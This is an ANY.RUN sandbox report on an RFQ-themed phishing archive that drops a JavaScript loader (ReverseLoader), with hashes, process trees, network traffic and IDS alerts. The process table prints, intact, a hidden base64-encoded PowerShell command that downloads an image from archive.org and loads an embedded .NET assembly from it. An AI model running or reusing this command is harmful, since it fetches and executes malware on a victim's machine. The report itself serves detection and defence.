URL:

https://jurnalpitung.or.id/RFQ25_0311_SPM_09390.7z

Full analysis: https://app.any.run/tasks/bbc9e927-c73d-44f4-a7b0-44a278c3374c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 03, 2025, 10:21:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-scr
loader
reverseloader
payload
possible-phishing
Indicators:
MD5:

99C00CFBB15011D33281BD547DE00FCA

SHA1:

1D14058DBA58882B2B2E4B0887D9512E70CD5990

SHA256:

263313E20BEFCDB2FCBE8CD5324C788CCEEC8B2CF0BEB888B8301E71C55916A9

SSDEEP:

3:N8AkcBsIXQ68r1o6VcWRf:2WB3Xv8r1ojWRf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • May hide the program window using WMI (SCRIPT)

      • wscript.exe (PID: 1128)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 1128)

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 1128)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7388)

    • REVERSELOADER has been detected (SURICATA)

      • powershell.exe (PID: 7388)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7388)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7388)

  • SUSPICIOUS

    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 1128)

    • The process executes JS scripts

      • WinRAR.exe (PID: 3132)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 1128)

    • Creates an object to access WMI (SCRIPT)

      • wscript.exe (PID: 1128)

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 3132)

    • Script creates XML DOM node (SCRIPT)

      • wscript.exe (PID: 1128)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 1128)

    • Executed via WMI

      • powershell.exe (PID: 7388)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7388)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7388)

    • Possible Social Engineering Attempted

      • svchost.exe (PID: 2276)

    • Query current time using 'w32tm.exe'

      • chrome.exe (PID: 7540)

  • INFO

    • Application launched itself

      • chrome.exe (PID: 7540)

    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 3132)

    • Launching a file from the Downloads directory

      • chrome.exe (PID: 7540)

    • Disables trace logs

      • powershell.exe (PID: 7388)

    • Checks proxy server information

      • powershell.exe (PID: 7388)

    • Checks supported languages

      • AddInProcess32.exe (PID: 7200)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
164
Monitored processes
18
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winrar.exe no specs wscript.exe no specs #REVERSELOADER powershell.exe conhost.exe no specs addinprocess32.exe no specs svchost.exe w32tm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1128"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa3132.44719\RFQ25_0311_SPM_09390.js" C:\Windows\System32\wscript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1632"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=4736,i,9595648181136327499,4719213237767607668,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4768 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2012"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=4844,i,9595648181136327499,4719213237767607668,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=2920 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2276C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2924"C:\Windows\SysWOW64\w32tm.exe"C:\Windows\SysWOW64\w32tm.exechrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Time Service Diagnostic Tool
Version:
10.0.19041.1 (WinBuild.160101.0800)
3132"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Downloads\RFQ25_0311_SPM_09390.7z"C:\Program Files\WinRAR\WinRAR.exechrome.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
7200"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
7324"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --field-trial-handle=4604,i,9595648181136327499,4719213237767607668,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4600 /prefetch:8C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
7328\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7388powershell -NoProfile -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('W05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJpdHlQcm90b2NvbFR5cGVdOjpUbHMxMjsgJGFjaGVsb3JzID0gTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50OyAkYWNoZWxvcnMuRW5jb2RpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4OyAkZ2hldHRvaXphdGlvbiA9ICRhY2hlbG9ycy5Eb3dubG9hZFN0cmluZygnaHR0cDovL2lhNjAxNDAxLnVzLmFyY2hpdmUub3JnLzM0L2l0ZW1zL21zaS1wcm8td2l0aC1iLTY0XzIwMjUxMDMxL01TSV9QUk9fd2l0aF9iNjQucG5nJyk7ICRjb21wcm9taXNlZCA9ICgkZ2hldHRvaXphdGlvbiAtbWF0Y2ggJ0Jhc2VTdGFydC0oLio/KS1CYXNlRW5kJyk7ICRnYXBlc2luZyA9ICRtYXRjaGVzWzFdOyAkc3BoZXJlcyA9IFtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdhcGVzaW5nKSk7ICRsaW5lbiA9ICcwaEhkCg11UVdhbk4zTDJWR1p1SWpjdVFHTnpnalozRVROMU0yWTJVV1pobGpNa0ZETmxaRE0zY3pNM0lET3hNR050SVdkdzl5TDZNSGMwUkhhJzsgJHRlcmVkaW5lID0gJHNwaGVyZXMuR2V0VHlwZSgnQ2xhc3NMaWJyYXJ5MS5DbGFzczEnKTsgJHF1aW56ZSA9ICR0ZXJlZGluZS5HZXRNZXRob2QoJ1ZBSScpOyAkcXVpbnplLkludm9rZSgkY29tcHJvbWlzZWQsIFtvYmplY3RbXV1AKCRsaW5lbiwnJywnQzpcVXNlcnNcUHVibGljXERvd25sb2Fkc1wnLCdOYW1lX0ZpbGUnLCdBZGRJblByb2Nlc3MzMicsJycsJ0FkZEluUHJvY2VzczMyJywnJywnVVJMJywnQzpcVXNlcnNcUHVibGljXERvd25sb2Fkc1wnLCdOYW1lX0ZpbGUnLCdqcycsJzEnLCcnLCdUYXNrX05hbWUnLCcwJywnJywnJywnJykpOw=='))| Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
7 258
Read events
7 248
Write events
10
Delete events
0

Modification events

(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Downloads\RFQ25_0311_SPM_09390.7z
(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3132) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.js\OpenWithProgids
Operation:writeName:JSFile
Value:
(PID) Process:(1128) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
C56A160000000000
Executable files
0
Suspicious files
23
Text files
22
Unknown types
0

Dropped files

PID
Process
Filename
Type
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old~RF1621a6.TMP
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old~RF1621b5.TMP
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old~RF1621b5.TMP
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old~RF1621b5.TMP
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old~RF1621c5.TMP
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\chrome_cart_db\LOG.old
MD5:
SHA256:
7540chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
35
DNS requests
30
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7812
chrome.exe
GET
200
142.250.185.238:80
http://clients2.google.com/time/1/current?cup2key=8:V1bRO95Dzf7zoHuhVz3ytXLsCP9Uq7Mk7J2viVnQyVo&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
US
text
107 b
whitelisted
412
svchost.exe
GET
200
23.55.110.211:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
DE
binary
825 b
whitelisted
7388
powershell.exe
GET
200
207.241.227.121:80
http://ia601401.us.archive.org/34/items/msi-pro-with-b-64_20251031/MSI_PRO_with_b64.png
US
image
2.84 Mb
whitelisted
1376
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
DE
binary
471 b
whitelisted
5240
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.3.crl
NL
binary
813 b
whitelisted
5240
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.3.crl
NL
binary
401 b
whitelisted
5240
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Time-Stamp%20PCA%202010(1).crl
NL
binary
814 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
412
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
2392
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5596
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.16.241.200:443
www.bing.com
Akamai International B.V.
DE
whitelisted
7812
chrome.exe
142.250.185.238:80
clients2.google.com
GOOGLE
US
whitelisted
4
System
192.168.100.255:138
whitelisted
7812
chrome.exe
142.250.185.170:443
safebrowsingohttpgateway.googleapis.com
GOOGLE
US
whitelisted
7812
chrome.exe
203.175.9.141:443
jurnalpitung.or.id
CV. Rumahweb Indonesia
ID
unknown
7812
chrome.exe
74.125.206.84:443
accounts.google.com
GOOGLE
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
  • 51.104.136.2
whitelisted
google.com
  • 216.58.206.46
whitelisted
www.bing.com
  • 2.16.241.200
  • 2.16.241.203
  • 2.16.241.221
  • 2.16.241.222
  • 2.16.241.225
  • 2.16.241.201
  • 2.16.241.204
  • 2.16.241.196
  • 2.16.241.197
whitelisted
clients2.google.com
  • 142.250.185.238
whitelisted
safebrowsingohttpgateway.googleapis.com
  • 142.250.185.170
  • 142.250.186.138
  • 142.250.184.234
  • 142.250.186.170
  • 142.250.186.74
  • 142.250.185.234
  • 216.58.206.74
  • 142.250.184.202
  • 142.251.140.170
  • 216.58.206.42
  • 172.217.18.10
  • 142.250.185.202
  • 142.250.186.42
  • 142.250.186.106
  • 142.250.181.234
  • 142.250.74.202
whitelisted
jurnalpitung.or.id
  • 203.175.9.141
unknown
accounts.google.com
  • 74.125.206.84
whitelisted
sb-ssl.google.com
  • 142.250.185.206
whitelisted
www.google.com
  • 142.250.186.36
whitelisted
safebrowsing.google.com
  • 142.250.186.142
whitelisted

Threats

PID
Process
Class
Message
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
7388
powershell.exe
A Network Trojan was detected
ET HUNTING Request To Image Hosted on Archive .org With Minimal Request Headers
7388
powershell.exe
A Network Trojan was detected
ET MALWARE Request To Malicious Image Hosted on Archive .org
7388
powershell.exe
A Network Trojan was detected
PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image
7388
powershell.exe
A Network Trojan was detected
ET ATTACK_RESPONSE ReverseLoader Base64 Encoded Executable In Image M2
7388
powershell.exe
Misc activity
ET INFO Observed Cloudflare R2 Public Bucket (r2 .dev) Domain in TLS SNI
2276
svchost.exe
Possible Social Engineering Attempted
SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
7388
powershell.exe
A Network Trojan was detected
ET ATTACK_RESPONSE ReverseLoader Base64 Encoded Executable In Image M1
2276
svchost.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Suspected Malicious Domain (pub-4c182737706e41d29aee6cc5517f834d .r2 .dev)
2276
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://jurnalpitung.or.id/RFQ25_0311_SPM_09390.7z